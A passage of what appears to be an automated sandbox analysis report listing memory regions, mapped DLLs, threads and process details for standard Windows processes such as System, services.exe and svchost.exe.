region_type = pagefile_backed name = "pagefile_0x0000009bbd2c0000" filename = "" Region: id = 13853 start_va = 0x9bbd450000 end_va = 0x9bbd5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009bbd450000" filename = "" Region: id = 13854 start_va = 0x9bbd5e0000 end_va = 0x9bbd69ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009bbd5e0000" filename = "" Region: id = 13855 start_va = 0x7ff6c4340000 end_va = 0x7ff6c443ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4340000" filename = "" Region: id = 13856 start_va = 0x7ff6c446b000 end_va = 0x7ff6c446cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c446b000" filename = "" Region: id = 13857 start_va = 0x7ffbed4e0000 end_va = 0x7ffbed53ffff entry_point = 0x7ffbed4e0000 region_type = mapped_file name = "conhostv1.dll" filename = "\\Windows\\System32\\ConhostV1.dll" (normalized: "c:\\windows\\system32\\conhostv1.dll") Region: id = 13858 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13859 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 13860 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13861 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13862 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13863 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13864 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13865 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 1065 os_tid = 0xda8 Thread: id = 1066 os_tid = 0xde0 Thread: id = 1067 os_tid = 0xcc4 Thread: id = 1068 os_tid = 0xca8 Process: id = "279" image_name = "System" filename = "" page_root = "0x1aa000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "277" os_parent_pid = "0xb08" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 14858 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 14859 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14860 start_va = 0xc500000000 end_va = 0xc500000fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c500000000" filename = "" Region: id = 14861 start_va = 0xc500010000 end_va = 0xc500010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c500010000" filename = "" Region: id = 14862 start_va = 0xc500020000 end_va = 0xc500020fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c500020000" filename = "" Region: id = 14863 start_va = 0xc500030000 end_va = 0xc50004ffff entry_point = 0x0 region_type = private name = "private_0x000000c500030000" filename = "" Region: id = 14864 start_va = 0xc500050000 end_va = 0xc50006ffff entry_point = 0x0 region_type = private name = "private_0x000000c500050000" filename = "" Region: id = 14865 start_va = 0xc500070000 end_va = 0xc50008ffff entry_point = 0x0 region_type = private name = "private_0x000000c500070000" filename = "" Region: id = 14866 start_va = 0xc500090000 end_va = 0xc5000affff entry_point = 0x0 region_type = private name = "private_0x000000c500090000" filename = "" Region: id = 14867 start_va = 0xc5000b0000 end_va = 0xc5000cffff entry_point = 0x0 region_type = private name = "private_0x000000c5000b0000" filename = "" Region: id = 14868 start_va = 0xc5000d0000 end_va = 0xc5000effff entry_point = 0x0 region_type = private name = "private_0x000000c5000d0000" filename = "" Region: id = 14869 start_va = 0xc5000f0000 end_va = 0xc50010ffff entry_point = 0x0 region_type = private name = "private_0x000000c5000f0000" filename = "" Region: id = 14870 start_va = 0xc500110000 end_va = 0xc50012ffff entry_point = 0x0 region_type = private name = "private_0x000000c500110000" filename = "" Region: id = 14871 start_va = 0xc500130000 end_va = 0xc50014ffff entry_point = 0x0 region_type = private name = "private_0x000000c500130000" filename = "" Region: id = 14872 start_va = 0xc500150000 end_va = 0xc50016ffff entry_point = 0x0 region_type = private name = "private_0x000000c500150000" filename = "" Region: id = 14873 start_va = 0xc500170000 end_va = 0xc50018ffff entry_point = 0x0 region_type = private name = "private_0x000000c500170000" filename = "" Region: id = 14874 start_va = 0xc500190000 end_va = 0xc5001affff entry_point = 0x0 region_type = private name = "private_0x000000c500190000" filename = "" Region: id = 14875 start_va = 0xc5001b0000 end_va = 0xc5001cffff entry_point = 0x0 region_type = private name = "private_0x000000c5001b0000" filename = "" Region: id = 14876 start_va = 0xc5001d0000 end_va = 0xc5001effff entry_point = 0x0 region_type = private name = "private_0x000000c5001d0000" filename = "" Region: id = 14877 start_va = 0xc5001f0000 end_va = 0xc50020ffff entry_point = 0x0 region_type = private name = "private_0x000000c5001f0000" filename = "" Region: id = 14878 start_va = 0xc500210000 end_va = 0xc50022ffff entry_point = 0x0 region_type = private name = "private_0x000000c500210000" filename = "" Region: id = 14879 start_va = 0xc500230000 end_va = 0xc50024ffff entry_point = 0x0 region_type = private name = "private_0x000000c500230000" filename = "" Region: id = 14880 start_va = 0xc500250000 end_va = 0xc50026ffff entry_point = 0x0 region_type = private name = "private_0x000000c500250000" filename = "" Region: id = 14881 start_va = 0xc500270000 end_va = 0xc50028ffff entry_point = 0x0 region_type = private name = "private_0x000000c500270000" filename = "" Region: id = 14882 start_va = 0xc500290000 end_va = 0xc5002affff entry_point = 0x0 region_type = private name = "private_0x000000c500290000" filename = "" Region: id = 14883 start_va = 0xc5002b0000 end_va = 0xc5002cffff entry_point = 0x0 region_type = private name = "private_0x000000c5002b0000" filename = "" Region: id = 14884 start_va = 0xc5002d0000 end_va = 0xc5002effff entry_point = 0x0 region_type = private name = "private_0x000000c5002d0000" filename = "" Region: id = 14885 start_va = 0xc5002f0000 end_va = 0xc50030ffff entry_point = 0x0 region_type = private name = "private_0x000000c5002f0000" filename = "" Region: id = 14886 start_va = 0xc500310000 end_va = 0xc50032ffff entry_point = 0x0 region_type = private name = "private_0x000000c500310000" filename = "" Region: id = 14887 start_va = 0xc500330000 end_va = 0xc50034ffff entry_point = 0x0 region_type = private name = "private_0x000000c500330000" filename = "" Region: id = 14888 start_va = 0xc500350000 end_va = 0xc50036ffff entry_point = 0x0 region_type = private name = "private_0x000000c500350000" filename = "" Region: id = 14889 start_va = 0xc500370000 end_va = 0xc50038ffff entry_point = 0x0 region_type = private name = "private_0x000000c500370000" filename = "" Region: id = 14890 start_va = 0xc500390000 end_va = 0xc5003affff entry_point = 0x0 region_type = private name = "private_0x000000c500390000" filename = "" Region: id = 14891 start_va = 0xc5003b0000 end_va = 0xc5003cffff entry_point = 0x0 region_type = private name = "private_0x000000c5003b0000" filename = "" Region: id = 14892 start_va = 0xc5003d0000 end_va = 0xc5003effff entry_point = 0x0 region_type = private name = "private_0x000000c5003d0000" filename = "" Region: id = 14893 start_va = 0xc5003f0000 end_va = 0xc50040ffff entry_point = 0x0 region_type = private name = "private_0x000000c5003f0000" filename = "" Region: id = 14894 start_va = 0xc500410000 end_va = 0xc50042ffff entry_point = 0x0 region_type = private name = "private_0x000000c500410000" filename = "" Region: id = 14895 start_va = 0xc500430000 end_va = 0xc50044ffff entry_point = 0x0 region_type = private name = "private_0x000000c500430000" filename = "" Region: id = 14896 start_va = 0xc500450000 end_va = 0xc50046ffff entry_point = 0x0 region_type = private name = "private_0x000000c500450000" filename = "" Region: id = 14897 start_va = 0xc500470000 end_va = 0xc50048ffff entry_point = 0x0 region_type = private name = "private_0x000000c500470000" filename = "" Region: id = 14898 start_va = 0xc500490000 end_va = 0xc5004affff entry_point = 0x0 region_type = private name = "private_0x000000c500490000" filename = "" Region: id = 14899 start_va = 0xc5004b0000 end_va = 0xc5004cffff entry_point = 0x0 region_type = private name = "private_0x000000c5004b0000" filename = "" Region: id = 14900 start_va = 0xc5004d0000 end_va = 0xc5004effff entry_point = 0x0 region_type = private name = "private_0x000000c5004d0000" filename = "" Region: id = 14901 start_va = 0xc5004f0000 end_va = 0xc50050ffff entry_point = 0x0 region_type = private name = "private_0x000000c5004f0000" filename = "" Region: id = 14902 start_va = 0xc500510000 end_va = 0xc50052ffff entry_point = 0x0 region_type = private name = "private_0x000000c500510000" filename = "" Region: id = 14903 start_va = 0xc500530000 end_va = 0xc50054ffff entry_point = 0x0 region_type = private name = "private_0x000000c500530000" filename = "" Region: id = 14904 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1069 os_tid = 0xcdc Thread: id = 1070 os_tid = 0x18 Thread: id = 1071 os_tid = 0x138 Thread: id = 1072 os_tid = 0x2c Thread: id = 1073 os_tid = 0x24 Thread: id = 1074 os_tid = 0x28 Thread: id = 1075 os_tid = 0xcc Thread: id = 1076 os_tid = 0x67c Thread: id = 1077 os_tid = 0x8c0 Thread: id = 1078 os_tid = 0x7c4 Thread: id = 1079 os_tid = 0x904 Thread: id = 1080 os_tid = 0xa1c Thread: id = 1081 os_tid = 0xb64 Thread: id = 1082 os_tid = 0x758 Thread: id = 1083 os_tid = 0xaf0 Thread: id = 1084 os_tid = 0xb1c Thread: id = 1085 os_tid = 0x200 Thread: id = 1086 os_tid = 0x1a4 Thread: id = 1087 os_tid = 0xb64 Thread: id = 1088 os_tid = 0x4cc Thread: id = 1089 os_tid = 0x30 Thread: id = 1090 os_tid = 0x848 Thread: id = 1091 os_tid = 0x6c4 Thread: id = 1092 os_tid = 0x2fc Thread: id = 1093 os_tid = 0xb54 Thread: id = 1094 os_tid = 0x758 Thread: id = 1095 os_tid = 0xb00 Thread: id = 1096 os_tid = 0xb0c Thread: id = 1097 os_tid = 0x3c Thread: id = 1098 os_tid = 0x590 Thread: id = 1099 os_tid = 0xb78 Thread: id = 1100 os_tid = 0xb6c Thread: id = 1101 os_tid = 0x10 Thread: id = 1102 os_tid = 0x9bc Thread: id = 1103 os_tid = 0x9b0 Thread: id = 1104 os_tid = 0x6c Thread: id = 1105 os_tid = 0x91c Thread: id = 1106 os_tid = 0x914 Thread: id = 1107 os_tid = 0x834 Thread: id = 1108 os_tid = 0x38 Thread: id = 1109 os_tid = 0x4d0 Thread: id = 1110 os_tid = 0x610 Thread: id = 1111 os_tid = 0xc8 Thread: id = 1112 os_tid = 0xc4 Thread: id = 1113 os_tid = 0xa8 Thread: id = 1114 os_tid = 0x648 Thread: id = 1115 os_tid = 0x644 Thread: id = 1116 os_tid = 0x62c Thread: id = 1117 os_tid = 0x614 Thread: id = 1118 os_tid = 0x5dc Thread: id = 1119 os_tid = 0xb8 Thread: id = 1120 os_tid = 0x578 Thread: id = 1121 os_tid = 0x56c Thread: id = 1122 os_tid = 0x178 Thread: id = 1123 os_tid = 0x48 Thread: id = 1124 os_tid = 0x4bc Thread: id = 1125 os_tid = 0x488 Thread: id = 1126 os_tid = 0x70 Thread: id = 1127 os_tid = 0x474 Thread: id = 1128 os_tid = 0xb0 Thread: id = 1129 os_tid = 0x144 Thread: id = 1130 os_tid = 0x174 Thread: id = 1131 os_tid = 0x78 Thread: id = 1132 os_tid = 0x74 Thread: id = 1133 os_tid = 0x44 Thread: id = 1134 os_tid = 0x40 Thread: id = 1135 os_tid = 0x8c Thread: id = 1136 os_tid = 0x338 Thread: id = 1137 os_tid = 0x2c0 Thread: id = 1138 os_tid = 0x168 Thread: id = 1139 os_tid = 0x84 Thread: id = 1140 os_tid = 0x104 Thread: id = 1141 os_tid = 0x7c Thread: id = 1142 os_tid = 0x14 Thread: id = 1143 os_tid = 0x1b0 Thread: id = 1144 os_tid = 0x20 Thread: id = 1145 os_tid = 0x17c Thread: id = 1146 os_tid = 0x170 Thread: id = 1147 os_tid = 0x16c Thread: id = 1148 os_tid = 0x160 Thread: id = 1149 os_tid = 0xe4 Thread: id = 1150 os_tid = 0x140 Thread: id = 1151 os_tid = 0x34 Thread: id = 1152 os_tid = 0xf0 Thread: id = 1153 os_tid = 0xa4 Thread: id = 1154 os_tid = 0x128 Thread: id = 1155 os_tid = 0x124 Thread: id = 1156 os_tid = 0xc0 Thread: id = 1157 os_tid = 0x60 Thread: id = 1158 os_tid = 0xb4 Thread: id = 1159 os_tid = 0x110 Thread: id = 1160 os_tid = 0xbc Thread: id = 1161 os_tid = 0x88 Thread: id = 1162 os_tid = 0xec Thread: id = 1163 os_tid = 0x64 Thread: id = 1164 os_tid = 0x8 Thread: id = 1165 os_tid = 0x0 Thread: id = 1387 os_tid = 0xdf4 Thread: id = 1392 os_tid = 0x618 Process: id = "280" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x27ae3000" os_pid = "0x1e4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "277" os_parent_pid = "0xb08" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 13877 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13878 start_va = 0xa4161d0000 end_va = 0xa4161dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a4161d0000" filename = "" Region: id = 13879 start_va = 0xa4161e0000 end_va = 0xa4161e4fff entry_point = 0xa4161e0000 region_type = mapped_file name = "services.exe.mui" filename = "\\Windows\\System32\\en-US\\services.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\services.exe.mui") Region: id = 13880 start_va = 0xa4161f0000 end_va = 0xa416203fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a4161f0000" filename = "" Region: id = 13881 start_va = 0xa416210000 end_va = 0xa416213fff entry_point = 0x0 region_type = private name = "private_0x000000a416210000" filename = "" Region: id = 13882 start_va = 0xa416290000 end_va = 0xa416293fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a416290000" filename = "" Region: id = 13883 start_va = 0xa4162a0000 end_va = 0xa4162a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a4162a0000" filename = "" Region: id = 13884 start_va = 0xa4162b0000 end_va = 0xa41636dfff entry_point = 0xa4162b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13885 start_va = 0xa416370000 end_va = 0xa416370fff entry_point = 0x0 region_type = private name = "private_0x000000a416370000" filename = "" Region: id = 13886 start_va = 0xa4163d0000 end_va = 0xa4163d6fff entry_point = 0x0 region_type = private name = "private_0x000000a4163d0000" filename = "" Region: id = 13887 start_va = 0xa416400000 end_va = 0xa4164fffff entry_point = 0x0 region_type = private name = "private_0x000000a416400000" filename = "" Region: id = 13888 start_va = 0xa416580000 end_va = 0xa4165fffff entry_point = 0x0 region_type = private name = "private_0x000000a416580000" filename = "" Region: id = 13889 start_va = 0xa416600000 end_va = 0xa41667ffff entry_point = 0x0 region_type = private name = "private_0x000000a416600000" filename = "" Region: id = 13890 start_va = 0xa416680000 end_va = 0xa4166fffff entry_point = 0x0 region_type = private name = "private_0x000000a416680000" filename = "" Region: id = 13891 start_va = 0xa416750000 end_va = 0xa416756fff entry_point = 0x0 region_type = private name = "private_0x000000a416750000" filename = "" Region: id = 13892 start_va = 0xa416760000 end_va = 0xa4167dffff entry_point = 0x0 region_type = private name = "private_0x000000a416760000" filename = "" Region: id = 13893 start_va = 0xa416800000 end_va = 0xa4168fffff entry_point = 0x0 region_type = private name = "private_0x000000a416800000" filename = "" Region: id = 13894 start_va = 0xa416900000 end_va = 0xa41697ffff entry_point = 0x0 region_type = private name = "private_0x000000a416900000" filename = "" Region: id = 13895 start_va = 0xa416980000 end_va = 0xa4169fffff entry_point = 0x0 region_type = private name = "private_0x000000a416980000" filename = "" Region: id = 13896 start_va = 0xa416a00000 end_va = 0xa416a7ffff entry_point = 0x0 region_type = private name = "private_0x000000a416a00000" filename = "" Region: id = 13897 start_va = 0xa416b00000 end_va = 0xa416b7ffff entry_point = 0x0 region_type = private name = "private_0x000000a416b00000" filename = "" Region: id = 13898 start_va = 0xa416b80000 end_va = 0xa416bfffff entry_point = 0x0 region_type = private name = "private_0x000000a416b80000" filename = "" Region: id = 13899 start_va = 0xa416c00000 end_va = 0xa416cfffff entry_point = 0x0 region_type = private name = "private_0x000000a416c00000" filename = "" Region: id = 13900 start_va = 0x7df5ff8b0000 end_va = 0x7ff5ff8affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff8b0000" filename = "" Region: id = 13901 start_va = 0x7ff64fbc4000 end_va = 0x7ff64fbc5fff entry_point = 0x0 region_type = private name = "private_0x00007ff64fbc4000" filename = "" Region: id = 13902 start_va = 0x7ff64fbc6000 end_va = 0x7ff64fbc7fff entry_point = 0x0 region_type = private name = "private_0x00007ff64fbc6000" filename = "" Region: id = 13903 start_va = 0x7ff64fbca000 end_va = 0x7ff64fbcbfff entry_point = 0x0 region_type = private name = "private_0x00007ff64fbca000" filename = "" Region: id = 13904 start_va = 0x7ff64fbcc000 end_va = 0x7ff64fbcdfff entry_point = 0x0 region_type = private name = "private_0x00007ff64fbcc000" filename = "" Region: id = 13905 start_va = 0x7ff64fbce000 end_va = 0x7ff64fbcffff entry_point = 0x0 region_type = private name = "private_0x00007ff64fbce000" filename = "" Region: id = 13906 start_va = 0x7ff64fbd0000 end_va = 0x7ff64fccffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff64fbd0000" filename = "" Region: id = 13907 start_va = 0x7ff64fcd0000 end_va = 0x7ff64fcf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff64fcd0000" filename = "" Region: id = 13908 start_va = 0x7ff64fcf3000 end_va = 0x7ff64fcf4fff entry_point = 0x0 region_type = private name = "private_0x00007ff64fcf3000" filename = "" Region: id = 13909 start_va = 0x7ff64fcf5000 end_va = 0x7ff64fcf5fff entry_point = 0x0 region_type = private name = "private_0x00007ff64fcf5000" filename = "" Region: id = 13910 start_va = 0x7ff64fcf6000 end_va = 0x7ff64fcf7fff entry_point = 0x0 region_type = private name = "private_0x00007ff64fcf6000" filename = "" Region: id = 13911 start_va = 0x7ff64fcf8000 end_va = 0x7ff64fcf9fff entry_point = 0x0 region_type = private name = "private_0x00007ff64fcf8000" filename = "" Region: id = 13912 start_va = 0x7ff64fcfa000 end_va = 0x7ff64fcfbfff entry_point = 0x0 region_type = private name = "private_0x00007ff64fcfa000" filename = "" Region: id = 13913 start_va = 0x7ff650490000 end_va = 0x7ff6504fffff entry_point = 0x7ff650490000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 13914 start_va = 0x7ffbfd180000 end_va = 0x7ffbfd18ffff entry_point = 0x7ffbfd180000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 13915 start_va = 0x7ffbff9b0000 end_va = 0x7ffbff9f7fff entry_point = 0x7ffbff9b0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 13916 start_va = 0x7ffbffa00000 end_va = 0x7ffbffa8dfff entry_point = 0x7ffbffa00000 region_type = mapped_file name = "scesrv.dll" filename = "\\Windows\\System32\\scesrv.dll" (normalized: "c:\\windows\\system32\\scesrv.dll") Region: id = 13917 start_va = 0x7ffbffb00000 end_va = 0x7ffbffb25fff entry_point = 0x7ffbffb00000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13918 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 13919 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 13920 start_va = 0x7ffc00670000 end_va = 0x7ffc0068afff entry_point = 0x7ffc00670000 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 13921 start_va = 0x7ffc00690000 end_va = 0x7ffc006a9fff entry_point = 0x7ffc00690000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 13922 start_va = 0x7ffc006b0000 end_va = 0x7ffc006b7fff entry_point = 0x7ffc006b0000 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 13923 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 13924 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 13925 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13926 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13927 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13928 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13929 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13930 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13931 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13932 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1166 os_tid = 0x36c Thread: id = 1167 os_tid = 0x358 Thread: id = 1168 os_tid = 0x33c Thread: id = 1169 os_tid = 0x30c Thread: id = 1170 os_tid = 0x308 Thread: id = 1171 os_tid = 0x294 Thread: id = 1172 os_tid = 0x260 Thread: id = 1173 os_tid = 0x240 Thread: id = 1174 os_tid = 0x238 Thread: id = 1397 os_tid = 0xc50 Process: id = "281" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6f1c3000" os_pid = "0x248" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BrokerInfrastructure" [0xa], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\DeviceInstall" [0xa], "NT SERVICE\\LSM" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT SERVICE\\SystemEventsBroker" [0xa], "NT AUTHORITY\\Logon Session 00000000:00005f6c" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 14008 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14009 start_va = 0x8649c0000 end_va = 0x8649cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000008649c0000" filename = "" Region: id = 14010 start_va = 0x8649d0000 end_va = 0x8649d4fff entry_point = 0x0 region_type = private name = "private_0x00000008649d0000" filename = "" Region: id = 14011 start_va = 0x8649e0000 end_va = 0x8649f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000008649e0000" filename = "" Region: id = 14012 start_va = 0x864a00000 end_va = 0x864a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000864a00000" filename = "" Region: id = 14013 start_va = 0x864a80000 end_va = 0x864a83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000864a80000" filename = "" Region: id = 14014 start_va = 0x864a90000 end_va = 0x864a90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000864a90000" filename = "" Region: id = 14015 start_va = 0x864aa0000 end_va = 0x864aa1fff entry_point = 0x0 region_type = private name = "private_0x0000000864aa0000" filename = "" Region: id = 14016 start_va = 0x864ab0000 end_va = 0x864b6dfff entry_point = 0x864ab0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14017 start_va = 0x864b70000 end_va = 0x864beffff entry_point = 0x0 region_type = private name = "private_0x0000000864b70000" filename = "" Region: id = 14018 start_va = 0x864bf0000 end_va = 0x864bf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000864bf0000" filename = "" Region: id = 14019 start_va = 0x864c00000 end_va = 0x864c06fff entry_point = 0x0 region_type = private name = "private_0x0000000864c00000" filename = "" Region: id = 14020 start_va = 0x864c10000 end_va = 0x864c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000864c10000" filename = "" Region: id = 14021 start_va = 0x864c90000 end_va = 0x864c90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000864c90000" filename = "" Region: id = 14022 start_va = 0x864ca0000 end_va = 0x864ca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000864ca0000" filename = "" Region: id = 14023 start_va = 0x864cb0000 end_va = 0x864cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000864cb0000" filename = "" Region: id = 14024 start_va = 0x864cc0000 end_va = 0x864cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000864cc0000" filename = "" Region: id = 14025 start_va = 0x864cd0000 end_va = 0x864cd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000864cd0000" filename = "" Region: id = 14026 start_va = 0x864ce0000 end_va = 0x864ce0fff entry_point = 0x0 region_type = pagefile_backed name = 